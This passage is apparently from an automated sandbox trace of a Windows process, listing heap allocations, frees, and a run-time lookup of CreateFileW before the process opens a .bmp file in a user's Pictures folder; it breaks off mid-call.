lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.428] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.431] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.434] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0094.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0094.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.435] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0094.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\maajsjcxjkdulec2t.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0094.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0094.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.438] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.439] HeapFree (in: 